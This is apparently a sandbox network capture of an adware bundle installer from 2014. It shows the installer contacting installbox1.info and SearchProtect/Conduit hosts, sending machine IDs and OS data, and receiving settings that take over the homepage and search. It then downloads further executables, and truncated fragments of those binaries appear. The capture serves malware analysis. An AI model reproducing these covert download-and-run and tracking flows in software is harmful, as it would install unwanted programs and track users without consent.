u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.e.n.7.5.]...T.i.t.
l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.u.t.t.o.n.2.=.".N.
o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?."...[.S.e.l.e.c.t.<<< skipped >>>

GET /spinstallersettings/2.16.10.61/test/ABTEST_SETTINGS_ID/carrierId/CT3309297 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-settings.spccint.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Content-Type: application/json; charset=text/plain

Last-Modified: Sat, 02 Aug 2014 07:18:17 GMT

ETag: "a55e817ccf82b7815aa0fbb683e056ce"

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Content-Length: 649

Cache-Control: private, max-age=900

Expires: Sat, 02 Aug 2014 07:34:39 GMT

Date: Sat, 02 Aug 2014 07:19:39 GMT

Connection: keep-alive

{"InstallerSettings":{"CHExtension_Id":null,"CHExtension_LandingPage":
null,"CHExtension_Name":null,"DEFAULT_CMD":null,"DUM":"2","InstallSPPD
river":null,"IsAUAllowednoTB":"true","LOST_USERS":"false","PING":"fals
e","SERVICE_LOST_USERS":null,"TbExternalAssetsEnable":"true","UNINSTAL
L_PING":"false"},"AbTestSettings":{"Experiment":"","Variant":"","TestP
arameter":""},"CarrierSettings":{"CHExtensionMode":"false","v_env":"tr
ue","v_env_10":"true","v_env_12":"false"},"signature":"fI88PfOLh/cwPkD
n6hWVaZZz5NmGlTLB/IX tlldXGPz/A16uO6j6bRrMZ gxZol5x97RJDaVTQa7kkp48CVU
4agw9/18mr b0KoBkbYs13i mPnJ xVcrlMWIryxcOvXr/CW0KNatxjsXax0OmD9Aw0Say
yFJFEUpJYYEpp4hc="}..

GET /?step_id=3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: c1.installbox1.info

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:19:24 GMT

Content-Type: text/html

Content-Length: 6822

Connection: close

Content-Disposition: attachment; filename="3.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".3.e.b.
b.3.d.8.c.-.0.5.f.4.-.4.0.e.3.-.9.c.b.e.-.2.8.e.d.5.e.1.d.3.2.6.4."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".1._.e.x.e."...I.n.s.t.a.l.l.e.
r.I.D.=.".9.3.2.4.4.7.4.0.4."...L.o.c.a.l.e.=.".<.L.a.n.g.u.a.g.e.&
gt;."...D.a.t.e.=.".2.0.1.4./.0.8./.0.2."...T.i.m.e.=.".7.:.1.9.:.2.4.
"...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.n.s.=.".0.".
..R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.r.t.e.d.=.".
"...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.d.R.e.p.o.r.
t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.S.e.r.v.e.r.
]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.I.n.f.o.]...
C.o.u.n.t.r.y.C.o.d.e.=.".U.S."...I.P.A.d.d.r.e.s.s.=.".1.8.4...1.0.7.
..3.8...3.8."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.d.G.e.n.]...P.e.
r.c.e.n.t.a.g.e.=.".6.4.".....[.S.c.r.e.e.n.7.5.]...T.i.t.l.e.=.".S.e.
t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.u.t.t.o.n.2.=.".N.o."...L.a.b.
e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?."...[.S.c.r.e.e.n.7.6.]...T.i.t.l.
e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.t.t.o.
n.2.=.".C.a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:. .t.h.
e. .d.o.w.n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.e.n...
 .P.l.e.a.s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.a.g.e.
 .f.o.r. .f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.e.l.e.c.<<< skipped >>>

GET /images/general_logo.bmp HTTP/1.1

Accept: */*

Host: i1.installbox1.info

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:19:23 GMT

Content-Type: image/x-ms-bmp

Content-Length: 21616

Last-Modified: Wed, 30 Jul 2014 00:07:05 GMT

Connection: close

ETag: "53d83729-5470"

Accept-Ranges: bytes

BMpT......6...(.......:...........:P..................................
........................u]`.!!!.%!).))).511.==9.NFD.VNJ.ZYY.nRS.u]`.li
g..cg.~~s..kk..ks..ss..s{...w..........sw.............................
....J...|.h.y.....s...............z...........................g.......
..................................................c...w...k...u.......
....{.................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....H.................................................................
..................................................................

<<< skipped >>>

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-installer.databssint.com

Content-Length: 687

Connection: Keep-Alive

Cache-Control: no-cache

{"event_type":"Stub_Init", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true -sessionid=M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 -downloadlength=688 -EXT_ISID=false", "download_length": "688", "carrier_ID": "CT3309297", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","installer_version":"2.4.2.5", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1"}
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:19:31 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-installer.databssint.com

Content-Length: 883

Connection: Keep-Alive

Cache-Control: no-cache

{"event_type":"Stub_DownloadComplete", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true -sessionid=M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 -downloadlength=688 -EXT_ISID=false", "download_length": "688", "carrier_ID": "CT3309297", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","installer_version":"2.4.2.5","result":"success","reason":"0" , "log":"10#6-0#", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1", "Installer_download_time_sec":"4", "Installer_url":"hXXp://sp-storage.spccinta.com/Installer/2.16.10.61/SPSetup.exe", "ExtraData":""}
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:19:35 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-installer.databssint.com

Content-Length: 792

Connection: Keep-Alive

Cache-Control: no-cache

{"event_type":"Stub_Complete", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true -sessionid=M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 -downloadlength=688 -EXT_ISID=false", "download_length": "688", "carrier_ID": "CT3309297", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","installer_version":"2.4.2.5","result":"success","reason":"0" , "log":"10#6-0#8#9-0-0#", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1", "Installer_time_sec":"27", "ExtraData":""}
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:20:03 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

POST / HTTP/1.1

Content-Type: application/json

Accept: */*

User-Agent: SearchProtect;2.16.10.61;Microsoft Windows XP;SP02A809A1-AD66-49FC-9E31-72DC6687025A

Host: sp-alive-msg.databssint.com

Content-Length: 435

Connection: Keep-Alive

Cache-Control: no-cache

{"SP_ID":"SP02A809A1-AD66-49FC-9E31-72DC6687025A","SP_version":"2.16.10.61","OS_name":"Microsoft Windows XP","OS_version":"5.1","install_date":"20140802","environment":"","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","Experiment":"","Variant":"","driver_enabled":"false","action_type":"alive","type":"","brand":"SP","browser":"InternetExplorer","browser_version":"6.0.2900.5512"}
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:19:57 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

HTTP/1.1 202 Accepted..Date: Sat, 02 Aug 2014 07:19:57 GMT..P3P: CP="N
OI ADM DEV COM NAV OUR STP"..Server: Apache-Coyote/1.1..Content-Length
: 0..Connection: keep-alive..

GET /Installer/2.16.10.61/SPSetup.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-storage.spccinta.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Last-Modified: Sat, 02 Aug 2014 10:02:31 GMT

Accept-Ranges: bytes

ETag: "9f6bb1485a2ed847d63f1614f5d9b70f"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 6824512

Date: Sat, 02 Aug 2014 07:19:32 GMT

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........#yd.B.7.B.7
.B.7..z7.B.7..l7.B.7.B.7.B.7.:.7.B.7...7.B.7.:.7.B.7Rich.B.7..........
..............PE..L....q.N.................d.......B..K5............@.
.........................`).......h...................................
............'..y............h.........................................
.....................................................text....c.......d
.................. ..`.rdata...............h..............@[email protected]...
[email protected].... ...........................
...rsrc....y....'..z..................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
...G..H.P.u..u..u...|[email protected][email protected].....@
..}[email protected]... M..........M........E...FQ.....NU..M
.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected][email protected][email protected] [email protected]..
...@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S..
...t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ.U.<<< skipped >>>

GET /download/CarrierId/CT3309297/CarrierVersion/DEFAULT/CarrierType/ctid/Brand/SP HTTP/1.1

Accept: application/sp-download-v2

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-download.spccint.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: application/json; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 02 Aug 2014 07:18:10 GMT

Content-Length: 70

"http:\/\/sp-storage.spccinta.com\/Installer\/2.16.10.61\/SPSetup.exe"
..

GET /?step_id=2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: c1.installbox1.info

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:19:23 GMT

Content-Type: text/html

Content-Length: 4416

Connection: close

Content-Disposition: attachment; filename="2.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".b.d.c.
4.6.c.3.7.-.a.0.7.2.-.4.6.8.0.-.a.1.5.5.-.4.e.b.1.f.5.c.7.e.e.5.5."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".1._.e.x.e."...I.n.s.t.a.l.l.e.
r.I.D.=.".9.3.2.4.4.7.4.0.4."...L.o.c.a.l.e.=.".<.L.a.n.g.u.a.g.e.&
gt;."...D.a.t.e.=.".2.0.1.4./.0.8./.0.2."...T.i.m.e.=.".7.:.1.9.:.2.3.
"...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.n.s.=.".0.".
..R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.r.t.e.d.=.".
"...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.d.R.e.p.o.r.
t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.S.e.r.v.e.r.
]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.I.n.f.o.]...
C.o.u.n.t.r.y.C.o.d.e.=.".U.S."...I.P.A.d.d.r.e.s.s.=.".1.8.4...1.0.7.
..3.8...3.8."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.d.G.e.n.]...P.e.
r.c.e.n.t.a.g.e.=.".2.1.".....[.S.c.r.e.e.n.7.6.]...T.i.t.l.e.=.".S.e.
t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.t.t.o.n.2.=.".C.
a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:. .t.h.e. .d.o.w.
n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.e.n... .P.l.e.a.
s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.a.g.e. .f.o.r. .
f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.e.n.7.5.]...T.i.
t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.u.t.t.o.n.2.=.".
N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?."...[.S.e.l.e.c.<<< skipped >>>

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: sp-installer.databssint.com

Content-Length: 951

Connection: Keep-Alive

Cache-Control: no-cache

{"event_type":"install_start","SP_ID":"SP02A809A1-AD66-49FC-9E31-72DC6687025A","SP_version":"2.16.10.61","OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)","OS_version":"5.1","browser":"InternetExplorer","browser_version":"6.0.2900.5512","carrier_type":"ctid","carrier_ID":"CT3309297","carrier_version":"","carrier_userid":"","carrier_UM":"","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","hp_takeover":"true","other_takeover":"true","environment":"","sequence_timestamp":"1406946097618","profile_number":"1","user_number":"1", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "download_length": 3172, "install_type": "install", "result": "SP_RESULT", "reason": "SP_FAIL_REASON","v_env_tests":"V_ENV_TESTS_ALIAS","v_env_codes":"V_ENV_CODES_ALIAS","channel_id": "", "brand": "SP" , "previous_brand":"", "brand_install_type":"","Experiment":"","Variant":""}
HTTP/1.1 202 Accepted

Date: Sat, 02 Aug 2014 07:19:45 GMT

P3P: CP="NOI ADM DEV COM NAV OUR STP"

Server: Apache-Coyote/1.1

Content-Length: 0

Connection: keep-alive

GET /UP/settings/?ctid=CT3309297&UM=&c=CA&DUM=2 HTTP/1.1

User-Agent: SearchProtect;2.16.10.61;Microsoft Windows XP;SP02A809A1-AD66-49FC-9E31-72DC6687025A

Accept: */*

Host: c.api.seccint.com


HTTP/1.1 200 OK

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNetMvc-Version: 3.0

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Content-Length: 4227

Cache-Control: private, max-age=3600

Expires: Sat, 02 Aug 2014 08:19:58 GMT

Date: Sat, 02 Aug 2014 07:19:58 GMT

Connection: keep-alive
{"GeneralId":null,"Ctid":"CT3309297","ProviderId":2,"ProviderName":"Bi
ng","UserIP":""%local server IP%"","UserLanguage":"en","ToolbarLanguage":"en
","EntityLanguage":"en","CountryShortCode":"CA","IsUserRTL":false,"IsT
oolbarRTL":false,"IsEntityRTL":false,"ShowClientDialog":true,"HomePage
Url":"hXXp://VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&
ISID=ISID_ID&SearchSource=55&CUI=SB_CUI&UM=6&UP=UP_ID","IsCustomizedHo
mepage":false,"HomePageButtonUrl":"hXXp://VVV.trovi.com/?gd=&ctid=CT33
09297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=55&CUI=SB_CUI&U
M=6&UP=UP_ID&SAT=HPB","UM":"","SearchDomain":"VVV.trovi.com","ToolbarS
earchBox":{"History":{"IsEnabled":true,"Position":1,"MaxAmount":5,"Lab
el":{"Text":"History"}},"Verticals":[{"Name":"SearchImages","SearchUrl
":"hXXp://VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISI
D=ISID_ID&SearchSource=67&SearchType=SearchImages&CUI=SB_CUI&UM=6&UP=U
P_ID&q=UCM_SEARCH_TERM","EmptySearchUrl":"hXXp://VVV.trovi.com/?gd=&ct
id=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=67&Searc
hType=SearchImages&CUI=SB_CUI&UM=6&UP=UP_ID"}],"EmptySearchUrl":"http:
//VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_I
D&SearchSource=67&CUI=SB_CUI&UM=6&UP=UP_ID","SearchUrl":"hXXp://VVV.tr
ovi.com/Results.aspx?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=IS
ID_ID&SearchSource=67&CUI=SB_CUI&UM=6&UP=UP_ID&q=UCM_SEARCH_TERM","Sug
gest":{"SearchResultsUrl":"hXXp://VVV.trovi.com/Results.aspx?gd=&ctid=
CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=67&Sugg<<< skipped >>>

GET /sp-downloader.exe HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: sp-storage.conduit-services.com


HTTP/1.1 200 OK

Last-Modified: Sat, 02 Aug 2014 10:18:02 GMT

Accept-Ranges: bytes

ETag: "32b94cf0ed04298eaab31147eadd7760"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 145928

Cache-Control: private, max-age=900

Expires: Sat, 02 Aug 2014 07:34:24 GMT

Date: Sat, 02 Aug 2014 07:19:24 GMT

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........#yd.B.7.B.7
.B.7..z7.B.7..l7.B.7.B.7.B.7.:.7.B.7...7.B.7.:.7.B.7Rich.B.7..........
..............PE..L....q.N.................d.......B..K5............@.
.........................p......wA....................................
...........`..(...........8"..........................................
.....................................................text....c.......d
.................. ..`.rdata...............h..............@[email protected]...
[email protected]............................
...rsrc...(....`......................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
...G..H.P.u..u..u...|[email protected][email protected].....@
..}[email protected]... M..........M........E...FQ.....NU..M
.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected][email protected][email protected] [email protected]..
...@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S..
...t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ.U.<<< skipped >>>

GET /ip/?client=sp HTTP/1.1

User-Agent: SearchProtect;2.16.10.61;Microsoft Windows XP;SP02A809A1-AD66-49FC-9E31-72DC6687025A

Accept: */*

Host: sp-ip2location.spccint.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 167

Content-Type: application/json; charset=text/plain

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 02 Aug 2014 07:18:35 GMT

{"Location":{"City":"MONTREAL","Country":"CANADA","CountryCode":"CA","
IP":""%local server IP%"","Latitude":45.50884,"Longitude":-73.58781,"Region"
:"QUEBEC"},"Language":"en"}..

GET /addons/agup.exe HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: i1.installbox1.info


HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:20:24 GMT

Content-Type: application/octet-stream

Content-Length: 1082880

Last-Modified: Wed, 30 Jul 2014 00:07:01 GMT

Connection: close

ETag: "53d83725-108600"

Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........G..[G..[
G..[!i([D..[.A*[]..[N.c[F..[.A([...[.A)[...[N.d[B..[N.t[H..[G..[...[G.
.[E..[!i4[N..[!i.[F..[!i [F..[RichG..[................PE..L......S....
.............d..........Cd............................................
...K..................................................................
.............................................9..@...............D.....
.......................text....c.......d.................. ..`.rdata..
f".......$...h..............@[email protected]..........................@.
...rsrc...............................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
.................................................i..C.....&....%......
.....U...E..8.u.3.].P..B..Y].U...}..u.3.]..E..u....P.u..JC.....].j... 
....U.....u..M.... ...E..t.V.X...Y....U.....j... ....U...M..M.... ...v
U....J...j...d....U...5.............u..F..t.j..........u.......t.3....
/U....M..G ...e...E.$....M..h.K...E.P..T...j...d....U...5.............
u..F..t.j....).....u.......t.3.....T....M.......e...E.$....M..h.K...E.
P.FT...j...d....T...5.............u..F..t.j..........u.......t.3...._T
....M..w....e...E.$....M..h.K...E.P..S...j...d...^T...5...........<<< skipped >>>

GET /addons/dfndr/180/tpq.exe HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: i1.installbox1.info


HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:20:04 GMT

Content-Type: application/octet-stream

Content-Length: 4983808

Last-Modified: Wed, 30 Jul 2014 00:07:02 GMT

Connection: close

ETag: "53d83726-4c0c00"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........U...U...
[email protected].....\...P...U.......U...T....L\.X....LF.T....L
C.T...RichU...................PE..L......R.....................0D.....
[email protected]...@...............
...................3..<.......0.A..................pK..E...........
...........................@..........................................
..text............................... ..`.rdata..t-...................
.......@[email protected]... [email protected][email protected]
.................@[email protected]......,[email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......E......E......E.
[email protected].;E.s..E..E....3E..E..E.i......E....E...U..].U.....
.}..u..e...r.E..E..E..E..E..E..E..E....E.@@.E..E.@@.E..E.H.E..}..v7.E.
....M....;.t%.E.....M....;.}..M.....E......E..E......e...E...U......M.
.E..M...;.u..P.E..8.t6.E......E..}..u.j..M..H....M.........E....E..E..
M.....j..M.."....M..v....E.....U..Q.M...U......M..E..x..r..E..E..E....
E....E..E..E..E..E.P.M.......E...D!H..E.....U..Q.M..M..O....E....t..u.
.....Y.E.....U..Q.M..M..(.....U..j.h..G.d.....Pd.%......,.M.j..M..

<<< skipped >>>

GET /?step_id=4_3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: c1.installbox1.info

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: openresty

Date: Sat, 02 Aug 2014 07:20:22 GMT

Content-Type: text/html

Content-Length: 6882

Connection: close

Content-Disposition: attachment; filename="4_3.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".d.e.9.
b.0.8.8.d.-.4.e.a.d.-.4.1.b.f.-.a.e.2.8.-.d.e.f.b.4.7.5.5.c.0.1.8."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".1._.e.x.e."...I.n.s.t.a.l.l.e.
r.I.D.=.".9.3.2.4.4.7.4.0.4."...L.o.c.a.l.e.=.".<.L.a.n.g.u.a.g.e.&
gt;."...D.a.t.e.=.".2.0.1.4./.0.8./.0.2."...T.i.m.e.=.".7.:.2.0.:.2.2.
"...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.n.s.=.".0.".
..R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.r.t.e.d.=.".
"...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.d.R.e.p.o.r.
t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.S.e.r.v.e.r.
]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.I.n.f.o.]...
C.o.u.n.t.r.y.C.o.d.e.=.".U.S."...I.P.A.d.d.r.e.s.s.=.".1.8.4...1.0.7.
..3.8...3.8."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.d.G.e.n.]...P.e.
r.c.e.n.t.a.g.e.=.".5.3.".....[.S.c.r.e.e.n.7.6.]...T.i.t.l.e.=.".S.e.
t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.t.t.o.n.2.=.".C.
a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:. .t.h.e. .d.o.w.
n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.e.n... .P.l.e.a.
s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.a.g.e. .f.o.r. .
f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.e.n.7.5.]...T.i.
t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.u.t.t.o.n.2.=.".
N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?."...[.S.e.l.e.c.<<< skipped >>>

GET /?step_id=1&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1

Accept: */*

User-Agent: TixDll

Host: c1.installbox1.info

Cache-Control: no-cache


